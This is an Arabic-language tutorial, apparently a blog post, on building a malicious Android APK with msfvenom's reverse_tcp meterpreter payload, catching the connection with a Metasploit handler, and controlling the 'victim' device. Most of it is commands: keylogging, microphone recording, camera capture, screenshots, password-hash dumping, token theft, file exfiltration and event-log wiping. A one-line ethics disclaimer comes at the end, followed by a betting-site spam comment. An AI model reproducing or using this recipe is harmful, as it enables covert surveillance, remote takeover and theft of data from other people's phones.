كيفية إنشاء Payload ملغم واستخدام Metasploit
1. إنشاء Payload ملغم باستخدام msfvenom:
افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk- استبدل
(Your IP)
بعنوان IP الخاص بك. - استبدل
(Your Port)
بالمنفذ الذي ترغب في استخدامه.
- استبدل
2. فتح Metasploit:
بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر:
./msfconsole
3. إعداد Metasploit لاستقبال الـ Payload:
في Metasploit، اتبع الأوامر التالية:
use exploit/multi/handlerset payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run
- استبدل
(Your IP)
بعنوان IP الخاص بك. - استبدل
(Your Port)
بالمنفذ الذي اخترته.
- استبدل
4. استخدام Metasploit للتحكم بالجهاز المخترق:
بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز:
help # عرض قائمة بالأوامر المتاحةshell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل
أوامر التحكم بالجهاز الضحية:
قفل برامج الضحية:
bgkill$عرض البرامج التي تعمل:
bglis$خروج:
exit$مساعدة:
help$استخراج معلومات:
info$ترقية صلاحيات:
migrate$- قراءة محتويات الملفات:
read$
تشغيل برامج الضحية:
run$
عرض محتويات الملفات:
cat$
تغيير الدليل:
cd$
حذف مجلد:
del$
تحميل ملفات من جهاز الضحية:
download$
إعادة تسمية الملفات:
edit$
رفع ملفات إلى جهاز الضحية:
upload$
مسح الأحداث:
clearev$
الحصول على الامتيازات:
getprivs$
قتل العمليات:
kill$
عرض العمليات:
ps$
إعادة تشغيل جهاز الضحية:
reboot$
تشغيل جهاز الضحية:
reg$
قفل جهاز الضحية:
shutdown$
سرقة الرموز:
steal_token$
جميع المعلومات:
sysinfs$
جهاز الضحية:
enumdesktops$
سطح مكتب الضحية:
getdesktop$
مراجعة وقت الخمول:
idletime$
تنصت على الكيلوجر:
keyscan_dump$ keyscan_start$ keyscan_stop$
التقاط شاشة الضحية:
screenshot$
إيقاف الماوس ولوحة المفاتيح:
uictl$استماع إلى ميكروفون الضحية:
record_mic$
فتح كاميرا الضحية:
cam_list$ cam_snap$
استخراج هاش من جهاز الضحية:
hashdump$
تنبيه: استخدم هذه الأدوات لأغراض تعليمية وأخلاقية فقط، وضمن حدود القوانين. تأكد من الحصول على إذن من مالكي الأجهزة قبل تنفيذ أي اختبارات أمان.
How to get crazy prop bets for super bowl, football match bet365 bet365 10cric 10cric 다파벳 다파벳 5285Livescore and Prediction Today
ردحذف